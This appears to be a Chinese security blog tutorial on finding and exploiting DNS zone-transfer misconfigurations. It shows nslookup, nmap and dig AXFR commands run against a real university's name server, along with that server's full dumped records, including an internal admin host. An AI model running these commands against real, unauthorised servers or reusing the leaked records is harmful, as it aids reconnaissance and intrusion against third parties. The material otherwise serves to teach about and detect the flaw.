美文网首页七星网络安全
dns 域传送漏洞利用总结

dns 域传送漏洞利用总结

作者: rivir | 来源:发表于2017-12-02 13:08 被阅读165次

    DNS分类

    最常用的DNS记录有以下几类:

    A记录 IP地址记录,记录一个域名对应的IP地址
    
    AAAA记录  IPv6地址记录,记录一个域名对应的IPv6地址
    
    CNAME记录   别名记录,记录一个主机的别名
    
    MX记录    电子邮件交换记录,记录一个邮件域名对应的IP地址,比如my[at]lijiejie.com
    后面的部分lijiejie.com,邮件服务器对应的IP地址
    
    NS记录      域名服务器记录 ,记录该域名由哪台域名服务器解析
    
    PTR记录     反向记录,也即从IP地址到域名的一条记录
    
    TXT记录     记录域名的相关文本信息
    
    SOA记录   start of anthorization 开始授权,是一种比较难以理解的记录值,一般二级域名才会有
    

    DNS域传送

    作为重要的互联网基础设施,难免成为黑客的重点攻击目标,服务的稳定性尤为重要。DNS服务器分为:主服务器、备份服务器和缓存服务器。在主备服务器之间同步数据库,需要使用“DNS域传送”。域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。

    若DNS服务器配置不当,可能导致匿名用户获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。凭借这份网络蓝图,攻击者可以节省很少的扫描时间。

    大的互联网厂商通常将内部网络与外部互联网隔离开,一个重要的手段是使用Private DNS。如果内部DNS泄露,将造成极大的安全风险。风险控制不当甚至造成整个内部网络沦陷。

    DNS域传送漏洞检测

    常用的三种检测方法: nslookup命令, nmap命令, dig命令, 下面将分别演示如何用三种方法检测dns域传送漏洞

    利用nslookup命令发现DNS域传送命令

    C:\Users\lj>nslookup
    默认服务器:  UnKnown
    Address:  211.82.100.1
    
    > server dns1.thnu.edu.cn
    默认服务器:  dns1.thnu.edu.cn
    Address:  125.223.168.5
    
    > ls thnu.edu.cn
    [dns1.thnu.edu.cn]
     thnu.edu.cn.                   NS     server = dns1.thnu.edu.cn
     admin                          A      172.16.200.11
     admissions                     A      222.160.127.36
     alumni                         A      222.160.127.36
     bwc                            A      222.160.127.36
     cxbd                           A      222.160.127.36
     cxzx                           A      222.160.127.36
     ddh                            A      222.160.127.38
     DNS1                           A      125.223.168.5
     dwb                            A      222.160.127.36
     ggl                            A      222.160.127.36
     gjjl                           A      222.160.127.36
     gjjy                           A      222.160.127.36
     gs                             A      222.160.127.36
     hqc                            A      222.160.127.36
     hxxy                           A      222.160.127.36
     jcc                            A      222.160.127.36
     jcjy                           A      222.160.127.36
     jjc                            A      222.160.127.36
     jjfz                           A      222.160.127.36
     jjw                            A      222.160.127.36
     jky                            A      222.160.127.36
     jsjxy                          A      222.160.127.36
     jwc                            A      222.160.127.36
     jwgl                           A      111.26.184.4
     jxjyxy                         A      222.160.127.36
     jy                             A      47.89.44.34
     jyw                            A      222.160.127.36
     jyx                            A      222.160.127.36
     kyc                            A      222.160.127.36
     kyys                           A      222.160.127.36
     kzfxt                          A      222.160.127.36
     lib                            A      222.160.127.36
     ltx                            A      222.160.127.36
     lxyz                           A      222.160.127.36
     mail                           A      222.160.127.37
     msx                            A      222.160.127.36
     msxy                           A      222.160.127.36
     mzmjms                         A      222.160.127.36
     news                           A      111.26.184.8
     nic                            A      222.160.127.36
     old                            A      222.160.124.253
     pgdata                         A      222.160.127.36
     qzlx                           A      222.160.127.35
     res                            A      222.160.124.242
     rsc                            A      222.160.127.36
     sasc                           A      222.160.127.36
     sdxy                           A      222.160.127.36
     shpg                           A      222.160.127.36
     sjc                            A      222.160.127.36
     sky                            A      222.160.127.36
     skyexam                        A      222.160.127.36
     swx                            A      222.160.127.36
     sxxy                           A      222.160.127.36
     szb                            A      222.160.127.36
     thsywl                         A      222.160.127.36
     tqms                           A      222.160.127.36
     tw                             A      222.160.127.36
     tyxy                           A      222.160.127.36
     tzb                            A      222.160.127.36
     web                            A      222.160.127.36
     www                            A      222.160.127.35
     wxy                            A      222.160.127.36
     wyxy                           A      222.160.127.36
     xb                             A      222.160.127.36
     xcb                            A      222.160.127.36
     xgh                            A      222.160.127.36
     xsc                            A      222.160.127.36
     xssx                           A      222.160.127.36
     xtw                            A      222.160.127.36
     xxgk                           A      222.160.127.36
     yb                             A      222.160.127.36
     yfzx                           A      222.160.127.35
     yyjs                           A      222.160.127.36
     yywz                           A      222.160.127.36
     yyxy                           A      222.160.127.36
     zcc                            A      222.160.127.36
     zf                             A      222.160.127.36
     zgs                            A      222.160.127.36
     zwkfzx                         A      222.160.127.36
     zysp                           A      222.160.127.36
     zzb                            A      222.160.127.36
    
    

    操作基本的步骤是:

    1. 输入nslookup命令进入交互式shell

    2. Server 命令参数设定查询将要使用的DNS服务器

    3. Ls命令列出某个域中的所有域名

    攻击者能获取的敏感主要包括:

    1)网络的拓扑结构,服务器集中的IP地址段

    2)数据库服务器的IP地址

    3)测试服务器的IP地址,

    4)VPN服务器地址泄露

    5)其他敏感服务器

    以上示例了存在漏洞的DNS服务器,若是不存在漏洞的主机,则可能提示错误Query Refused:

    D:\>nslookup
    默认服务器:  public1.114dns.com
    Address:  114.114.114.114
    
    > server ns.pku.edu.cn
    默认服务器:  ns.pku.edu.cn
    Address:  202.112.7.13
    
    > ls pku.edu.cn
    [ns.pku.edu.cn]
    *** 无法列出域 pku.edu.cn: Query refused
    DNS 服务器拒绝将区域 pku.edu.cn 传送到您的计算机。如果这不正确,
    请检查 IP 地址 202.112.7.13 的 DNS 服务器上 pku.edu.cn 的
    区域传送安全设置。
    

    使用nmap扫描DNS域传送泄露漏洞

    nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=thnu.edu.cn -p 53 -Pn dns1.thnu.edu.cn
    
    Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:24 CST
    Nmap scan report for dns1.thnu.edu.cn (125.223.168.5)
    Host is up (0.031s latency).
    
    PORT   STATE SERVICE
    53/tcp open  domain
    | dns-zone-transfer: 
    | thnu.edu.cn.             SOA  dns1.thnu.edu.cn. root.thnu.edu.cn.
    | thnu.edu.cn.             NS   dns1.thnu.edu.cn.
    | thnu.edu.cn.             MX   0 mail.thnu.edu.cn.
    | admin.thnu.edu.cn.       A    172.16.200.11
    | admissions.thnu.edu.cn.  A    222.160.127.36
    | alumni.thnu.edu.cn.      A    222.160.127.36
    | bwc.thnu.edu.cn.         A    222.160.127.36
    | cxbd.thnu.edu.cn.        A    222.160.127.36
    | cxzx.thnu.edu.cn.        A    222.160.127.36
    | ddh.thnu.edu.cn.         A    222.160.127.38
    | DNS1.thnu.edu.cn.        A    125.223.168.5
    | dwb.thnu.edu.cn.         A    222.160.127.36
    | ggl.thnu.edu.cn.         A    222.160.127.36
    | gjjl.thnu.edu.cn.        A    222.160.127.36
    | gjjy.thnu.edu.cn.        A    222.160.127.36
    | gs.thnu.edu.cn.          A    222.160.127.36
    | hqc.thnu.edu.cn.         A    222.160.127.36
    | hxxy.thnu.edu.cn.        A    222.160.127.36
    | jcc.thnu.edu.cn.         A    222.160.127.36
    | jcjy.thnu.edu.cn.        A    222.160.127.36
    | jjc.thnu.edu.cn.         A    222.160.127.36
    | jjfz.thnu.edu.cn.        A    222.160.127.36
    | jjw.thnu.edu.cn.         A    222.160.127.36
    | jky.thnu.edu.cn.         A    222.160.127.36
    | jsjxy.thnu.edu.cn.       A    222.160.127.36
    | jwc.thnu.edu.cn.         A    222.160.127.36
    | jwgl.thnu.edu.cn.        A    111.26.184.4
    | jxjyxy.thnu.edu.cn.      A    222.160.127.36
    | jy.thnu.edu.cn.          A    47.89.44.34
    | jyw.thnu.edu.cn.         A    222.160.127.36
    | jyx.thnu.edu.cn.         A    222.160.127.36
    | kyc.thnu.edu.cn.         A    222.160.127.36
    | kyys.thnu.edu.cn.        A    222.160.127.36
    | kzfxt.thnu.edu.cn.       A    222.160.127.36
    | lib.thnu.edu.cn.         A    222.160.127.36
    | ltx.thnu.edu.cn.         A    222.160.127.36
    | lxyz.thnu.edu.cn.        A    222.160.127.36
    | mail.thnu.edu.cn.        A    222.160.127.37
    | msx.thnu.edu.cn.         A    222.160.127.36
    | msxy.thnu.edu.cn.        A    222.160.127.36
    | mzmjms.thnu.edu.cn.      A    222.160.127.36
    | news.thnu.edu.cn.        A    111.26.184.8
    | nic.thnu.edu.cn.         A    222.160.127.36
    | old.thnu.edu.cn.         A    222.160.124.253
    | pgdata.thnu.edu.cn.      A    222.160.127.36
    | qzlx.thnu.edu.cn.        A    222.160.127.35
    | res.thnu.edu.cn.         A    222.160.124.242
    | rsc.thnu.edu.cn.         A    222.160.127.36
    | sasc.thnu.edu.cn.        A    222.160.127.36
    | sdxy.thnu.edu.cn.        A    222.160.127.36
    | shpg.thnu.edu.cn.        A    222.160.127.36
    | sjc.thnu.edu.cn.         A    222.160.127.36
    | sky.thnu.edu.cn.         A    222.160.127.36
    | skyexam.thnu.edu.cn.     A    222.160.127.36
    | swx.thnu.edu.cn.         A    222.160.127.36
    | sxxy.thnu.edu.cn.        A    222.160.127.36
    | szb.thnu.edu.cn.         A    222.160.127.36
    | thsywl.thnu.edu.cn.      A    222.160.127.36
    | tqms.thnu.edu.cn.        A    222.160.127.36
    | tw.thnu.edu.cn.          A    222.160.127.36
    | tyxy.thnu.edu.cn.        A    222.160.127.36
    | tzb.thnu.edu.cn.         A    222.160.127.36
    | web.thnu.edu.cn.         A    222.160.127.36
    | www.thnu.edu.cn.         A    222.160.127.35
    | wxy.thnu.edu.cn.         A    222.160.127.36
    | wyxy.thnu.edu.cn.        A    222.160.127.36
    | xb.thnu.edu.cn.          A    222.160.127.36
    | xcb.thnu.edu.cn.         A    222.160.127.36
    | xgh.thnu.edu.cn.         A    222.160.127.36
    | xsc.thnu.edu.cn.         A    222.160.127.36
    | xssx.thnu.edu.cn.        A    222.160.127.36
    | xtw.thnu.edu.cn.         A    222.160.127.36
    | xxgk.thnu.edu.cn.        A    222.160.127.36
    | yb.thnu.edu.cn.          A    222.160.127.36
    | yfzx.thnu.edu.cn.        A    222.160.127.35
    | yyjs.thnu.edu.cn.        A    222.160.127.36
    | yywz.thnu.edu.cn.        A    222.160.127.36
    | yyxy.thnu.edu.cn.        A    222.160.127.36
    | zcc.thnu.edu.cn.         A    222.160.127.36
    | zf.thnu.edu.cn.          A    222.160.127.36
    | zgs.thnu.edu.cn.         A    222.160.127.36
    | zwkfzx.thnu.edu.cn.      A    222.160.127.36
    | zysp.thnu.edu.cn.        A    222.160.127.36
    | zzb.thnu.edu.cn.         A    222.160.127.36
    |_thnu.edu.cn.             SOA  dns1.thnu.edu.cn. root.thnu.edu.cn.
    
    Nmap done: 1 IP address (1 host up) scanned in 4.79 seconds
    
    

    对上述命令命令说明如下:

    nmap –script dns-zone-transfer表示加载nmap文件夹下的脚本文件dns-zone-transfer.nse,扩展名.nse可省略

    –script-args dns-zone-transfer.domain=zonetransfer.me向脚本传递参数,设置列出记录的域是nwpu.edu.cn

    -p 53设置扫描53端口

    -Pn:设置通过Ping发现主机是否存活

    利用dig 检测dns域传送漏洞

    这里涉及dig 一个重要的命令axfr:

    axfr 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。

    我们只要欺骗dns服务器发送一个axfr请求过去, 如果该dns服务器上存在该漏洞,就会返回所有的解析记录值

    第一步: 找到解析域名的dns服务器(Server服务器), 我们可以发送一个ns类型解析请求过去

    dig thnu.edu.cn ns
    
    ;; ANSWER SECTION:
    thnu.edu.cn.        2185    IN  NS  DNS1.thnu.edu.cn.
    

    第二步: 然后向该域名发送axfr 请求:

    ❰root❙~❱✔≻ dig axfr @dns1.thnu.edu.cn thnu.edu.cn
    
    ; <<>> DiG 9.10.3-P4-Debian <<>> axfr @dns1.thnu.edu.cn thnu.edu.cn
    ; (1 server found)
    ;; global options: +cmd
    thnu.edu.cn.        3600    IN  SOA dns1.thnu.edu.cn. root.thnu.edu.cn. 2017102704 30 30 360 3600
    thnu.edu.cn.        3600    IN  NS  dns1.thnu.edu.cn.
    thnu.edu.cn.        3600    IN  MX  0 mail.thnu.edu.cn.
    admin.thnu.edu.cn.  3600    IN  A   172.16.200.11
    admissions.thnu.edu.cn. 3600    IN  A   222.160.127.36
    alumni.thnu.edu.cn. 3600    IN  A   222.160.127.36
    bwc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    cxbd.thnu.edu.cn.   3600    IN  A   222.160.127.36
    cxzx.thnu.edu.cn.   3600    IN  A   222.160.127.36
    ddh.thnu.edu.cn.    3600    IN  A   222.160.127.38
    DNS1.thnu.edu.cn.   3600    IN  A   125.223.168.5
    dwb.thnu.edu.cn.    3600    IN  A   222.160.127.36
    ggl.thnu.edu.cn.    3600    IN  A   222.160.127.36
    gjjl.thnu.edu.cn.   3600    IN  A   222.160.127.36
    gjjy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    gs.thnu.edu.cn.     3600    IN  A   222.160.127.36
    hqc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    hxxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    jcc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    jcjy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    jjc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    jjfz.thnu.edu.cn.   3600    IN  A   222.160.127.36
    jjw.thnu.edu.cn.    3600    IN  A   222.160.127.36
    jky.thnu.edu.cn.    3600    IN  A   222.160.127.36
    jsjxy.thnu.edu.cn.  3600    IN  A   222.160.127.36
    jwc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    jwgl.thnu.edu.cn.   3600    IN  A   111.26.184.4
    jxjyxy.thnu.edu.cn. 3600    IN  A   222.160.127.36
    jy.thnu.edu.cn.     3600    IN  A   47.89.44.34
    jyw.thnu.edu.cn.    3600    IN  A   222.160.127.36
    jyx.thnu.edu.cn.    3600    IN  A   222.160.127.36
    kyc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    kyys.thnu.edu.cn.   3600    IN  A   222.160.127.36
    kzfxt.thnu.edu.cn.  3600    IN  A   222.160.127.36
    lib.thnu.edu.cn.    3600    IN  A   222.160.127.36
    ltx.thnu.edu.cn.    3600    IN  A   222.160.127.36
    lxyz.thnu.edu.cn.   3600    IN  A   222.160.127.36
    mail.thnu.edu.cn.   3600    IN  A   222.160.127.37
    msx.thnu.edu.cn.    3600    IN  A   222.160.127.36
    msxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    mzmjms.thnu.edu.cn. 3600    IN  A   222.160.127.36
    news.thnu.edu.cn.   3600    IN  A   111.26.184.8
    nic.thnu.edu.cn.    3600    IN  A   222.160.127.36
    old.thnu.edu.cn.    3600    IN  A   222.160.124.253
    pgdata.thnu.edu.cn. 3600    IN  A   222.160.127.36
    qzlx.thnu.edu.cn.   3600    IN  A   222.160.127.35
    res.thnu.edu.cn.    3600    IN  A   222.160.124.242
    rsc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    sasc.thnu.edu.cn.   3600    IN  A   222.160.127.36
    sdxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    shpg.thnu.edu.cn.   3600    IN  A   222.160.127.36
    sjc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    sky.thnu.edu.cn.    3600    IN  A   222.160.127.36
    skyexam.thnu.edu.cn.    3600    IN  A   222.160.127.36
    swx.thnu.edu.cn.    3600    IN  A   222.160.127.36
    sxxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    szb.thnu.edu.cn.    3600    IN  A   222.160.127.36
    thsywl.thnu.edu.cn. 3600    IN  A   222.160.127.36
    tqms.thnu.edu.cn.   3600    IN  A   222.160.127.36
    tw.thnu.edu.cn.     3600    IN  A   222.160.127.36
    tyxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    tzb.thnu.edu.cn.    3600    IN  A   222.160.127.36
    web.thnu.edu.cn.    3600    IN  A   222.160.127.36
    www.thnu.edu.cn.    3600    IN  A   222.160.127.35
    wxy.thnu.edu.cn.    3600    IN  A   222.160.127.36
    wyxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    xb.thnu.edu.cn.     3600    IN  A   222.160.127.36
    xcb.thnu.edu.cn.    3600    IN  A   222.160.127.36
    xgh.thnu.edu.cn.    3600    IN  A   222.160.127.36
    xsc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    xssx.thnu.edu.cn.   3600    IN  A   222.160.127.36
    xtw.thnu.edu.cn.    3600    IN  A   222.160.127.36
    xxgk.thnu.edu.cn.   3600    IN  A   222.160.127.36
    yb.thnu.edu.cn.     3600    IN  A   222.160.127.36
    yfzx.thnu.edu.cn.   3600    IN  A   222.160.127.35
    yyjs.thnu.edu.cn.   3600    IN  A   222.160.127.36
    yywz.thnu.edu.cn.   3600    IN  A   222.160.127.36
    yyxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
    zcc.thnu.edu.cn.    3600    IN  A   222.160.127.36
    zf.thnu.edu.cn.     3600    IN  A   222.160.127.36
    zgs.thnu.edu.cn.    3600    IN  A   222.160.127.36
    zwkfzx.thnu.edu.cn. 3600    IN  A   222.160.127.36
    zysp.thnu.edu.cn.   3600    IN  A   222.160.127.36
    zzb.thnu.edu.cn.    3600    IN  A   222.160.127.36
    thnu.edu.cn.        3600    IN  SOA dns1.thnu.edu.cn. root.thnu.edu.cn. 2017102704 30 30 360 3600
    ;; Query time: 43 msec
    ;; SERVER: 125.223.168.5#53(125.223.168.5)
    ;; WHEN: Sat Nov 04 14:12:57 CST 2017
    ;; XFR size: 85 records (messages 1, bytes 1819)
    
    

    参考: http://www.lijiejie.com/?s=dns&submit=Search

    相关文章

      网友评论

        本文标题:dns 域传送漏洞利用总结

        本文链接:https://www.haomeiwen.com/subject/mkdnbxtx.html